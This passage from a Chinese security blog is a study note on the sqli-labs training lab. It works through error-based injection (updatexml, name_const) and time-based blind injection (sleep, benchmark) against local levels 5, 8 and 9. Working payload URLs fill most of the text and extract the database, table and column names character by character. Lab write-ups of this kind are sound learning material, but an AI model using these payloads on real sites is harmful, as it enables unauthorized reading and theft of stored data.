<p>UPDATEXML (XML_document, XPath_string, new_value);<br>第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc<br>第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。<br>第三个参数：new_value，String格式，替换查找到的符合条件的数据 </p>
<p><strong>作用：改变文档中符合条件的节点的值</strong></p>
<p>测试：</p>
<p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_20-53-29.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=2%27%20and%20updatexml(null,concat(0x7e,(select%20@@version),0x7e),0x7e)--+</span><br></pre></td></tr></table></figure>
<h3 id="利用数据的重复性"><a href="#利用数据的重复性" class="headerlink" title="利用数据的重复性"></a>利用数据的重复性</h3><p><img src="https://raw.githubusercontent.com/srat1999/Pictures/master/img/Snipaste_2019-08-02_21-19-12.png" alt></p>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=2%27%20union%20select%201,2,2%20from%20(select%20name_const(version(),1),name_const(version(),1))a--+</span><br></pre></td></tr></table></figure>
<h2 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h2><h3 id="sleep函数"><a href="#sleep函数" class="headerlink" title="sleep函数"></a>sleep函数</h3><p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1%27%20and%20if(ascii(substr(database(),1,1))=114,1,sleep(5))--+</span><br><span class="line"></span><br><span class="line">http://127.0.0.1/sqli-labs/Less-8/?id=1%22%20and%20if(ascii(substr(database(),1,1))=115,1,sleep(5))--+</span><br></pre></td></tr></table></figure>
<p>如果报错就延迟五秒，在浏览器的状态下观察就是会持续加载5秒。</p>
<h3 id="benchmark函数"><a href="#benchmark函数" class="headerlink" title="benchmark函数"></a>benchmark函数</h3><blockquote>
<p>BENCHMARK(count,expr)用于测试函数的性能，参数一为次数，二为要执行的表达式。可以让函数执行若干次，返回结果比平时要长，通过时间长短的变化，判断语句是否执行成功。</p>
</blockquote>
<p>payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-5/?id=1&apos; union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode(&apos;msg&apos;,&apos;by 5 sec&apos;)),null)),2,3 from (select database() as current ) as tb1--+</span><br></pre></td></tr></table></figure>
<h3 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h3><p>这一关卡无论有没有报错都会显示”you are in “.因此不能进行bool盲注，更不能进行报错注入。</p>
<p>只能延时注入。</p>
<h4 id="修改substr参数进行数据库爆破。"><a href="#修改substr参数进行数据库爆破。" class="headerlink" title="修改substr参数进行数据库爆破。"></a>修改substr参数进行数据库爆破。</h4><p>s</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11%27%20and%20if(ascii(substr(database(),1,1))=115,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>e</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11%27%20and%20if(ascii(substr(database(),2,1))=101,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>3</p>
<p>……</p>
<p>依次可得数据库名：security</p>
<h4 id="表名爆破"><a href="#表名爆破" class="headerlink" title="表名爆破"></a>表名爆破</h4><ol>
<li>1 第一个表，第一个字符:e</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),1,1))=101,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<ol>
<li>2 第一个表，第二个字符:m</li>
</ol>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 0,1),2,1))=109,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>…..</p>
<p>可得第一个表名为email</p>
<ol start="2">
<li><p>1 第二个表，第一个字符：r</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select table_name from information_schema.tables where table_schema=&apos;security&apos; limit 1,1),1,1))=114,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>……</p>
<p>依次爆破得表名：referers</p>
<p>所以可以得到所有表明 eamils，referers，uagents，users</p>
<h4 id="猜测emails表字段"><a href="#猜测emails表字段" class="headerlink" title="猜测emails表字段"></a>猜测emails表字段</h4><p>第一个字段</p>
<p>i</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select column_name from information_schema.columns where table_name=&apos;emails&apos; limit 0,1),1,1))=105,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>d</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select column_name from information_schema.columns where table_name=&apos;emails&apos; limit 0,1),2,1))=100,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>第二个字段</p>
<p>e</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select column_name from information_schema.columns where table_name=&apos;emails&apos; limit 1,1),1,1))=100,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>m</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select column_name from information_schema.columns where table_name=&apos;emails&apos; limit 1,1),2,1))=109,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>……</p>
<p>两个字段为 id和email_id</p>
<h4 id="爆破数据"><a href="#爆破数据" class="headerlink" title="爆破数据"></a>爆破数据</h4><p>爆破emails表的email_id字段具体内容</p>
<p>D</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select email_id from emails  limit 0,1),1,1))=68,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>u</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://127.0.0.1/sqli-labs/Less-9/?id=11&apos; and if(ascii(substr((select email_id from emails  limit 0,1),2,1))=117,sleep(5),1)--+</span><br></pre></td></tr></table></figure>
<p>…..</p>
<p>得到第一个数据<a href="mailto:Dumb@dhakkan.com" target="_blank" rel="noopener">Dumb@dhakkan.com</a>，剩下依次类推。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sql注入/" rel="tag"># sql注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/07/27/pikachu漏洞平台学习（7）/" rel="next" title="pikachu漏洞平台学习（7）">
                <i class="fa fa-chevron-left"></i> pikachu漏洞平台学习（7）
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/08/03/MITMF内网渗透框架安装+初步体验/" rel="prev" title="MITMF内网渗透框架安装问题">
                MITMF内网渗透框架安装问题 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/pikachu.jpg" alt="srat1999">
            
              <p class="site-author-name" itemprop="name">srat1999</p>
              <p class="site-description motion-element" itemprop="description">the higher you stand the more you can see</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">55</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">30</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/srat1999" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:srat1999@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#GET型注入"><span class="nav-number">1.</span> <span class="nav-text">GET型注入</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#数据库注入流程"><span class="nav-number">2.</span> <span class="nav-text">数据库注入流程</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ps-limit用法。"><span class="nav-number">2.0.0.1.</span> <span class="nav-text">ps:limit用法。</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#盲注"><span class="nav-number">3.</span> <span class="nav-text">盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#bool盲注"><span class="nav-number">3.1.</span> <span class="nav-text">bool盲注</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#使用left函数"><span class="nav-number">3.1.1.</span> <span class="nav-text">使用left函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用ascii和substr函数"><span class="nav-number">3.1.2.</span> <span class="nav-text">使用ascii和substr函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用Regexp"><span class="nav-number">3.1.3.</span> <span class="nav-text">使用Regexp</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#使用MID-ORD"><span class="nav-number">3.1.4.</span> <span class="nav-text">使用MID ORD</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#报错注入"><span class="nav-number">3.2.</span> <span class="nav-text">报错注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#概述"><span class="nav-number">3.2.1.</span> <span class="nav-text">概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#rand函数"><span class="nav-number">3.2.2.</span> <span class="nav-text">rand函数</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01-查询数据库"><span class="nav-number">3.2.2.1.</span> <span class="nav-text">0x01 查询数据库</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#0x02查用户"><span class="nav-number">3.2.2.2.</span> <span class="nav-text">0x02查用户</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#double数值类型超出范围注入"><span class="nav-number">3.2.3.</span> <span class="nav-text">double数值类型超出范围注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#0x01举例"><span class="nav-number">3.2.3.1.</span> <span class="nav-text">0x01举例</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#BIGINT溢出"><span class="nav-number">3.2.4.</span> <span class="nav-text">BIGINT溢出</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#xpath函数报错"><span class="nav-number">3.2.5.</span> <span class="nav-text">xpath函数报错</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#extarctvalue"><span class="nav-number">3.2.5.1.</span> <span class="nav-text">extarctvalue()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#updataxml"><span class="nav-number">3.2.5.2.</span> <span class="nav-text">updataxml()</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用数据的重复性"><span class="nav-number">3.2.6.</span> <span class="nav-text">利用数据的重复性</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#延时注入"><span class="nav-number">3.3.</span> <span class="nav-text">延时注入</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#sleep函数"><span class="nav-number">3.3.1.</span> <span class="nav-text">sleep函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#benchmark函数"><span class="nav-number">3.3.2.</span> <span class="nav-text">benchmark函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-9"><span class="nav-number">3.3.3.</span> <span class="nav-text">Less-9</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#修改substr参数进行数据库爆破。"><span class="nav-number">3.3.3.1.</span> <span class="nav-text">修改substr参数进行数据库爆破。</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#表名爆破"><span class="nav-number">3.3.3.2.</span> <span class="nav-text">表名爆破</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#猜测emails表字段"><span class="nav-number">3.3.3.3.</span> <span class="nav-text">猜测emails表字段</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#爆破数据"><span class="nav-number">3.3.3.4.</span> <span class="nav-text">爆破数据</span></a></li></ol></li></ol></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">srat1999</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">70.1k</span>
  
</div>


  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>




        







  <div>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26show%3Dpic' type='text/javascript'%3E%3C/script%3E"));</script>
    <script type="text/javascript">var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");document.write(unescape("%3Cspan id='cnzz_stat_icon_1278555274'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "s4.cnzz.com/z_stat.php%3Fid%3D1278555274%26online%3D1%26show%3Dline' type='text/javascript'%3E%3C/script%3E"));</script>
  </div>
 



        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
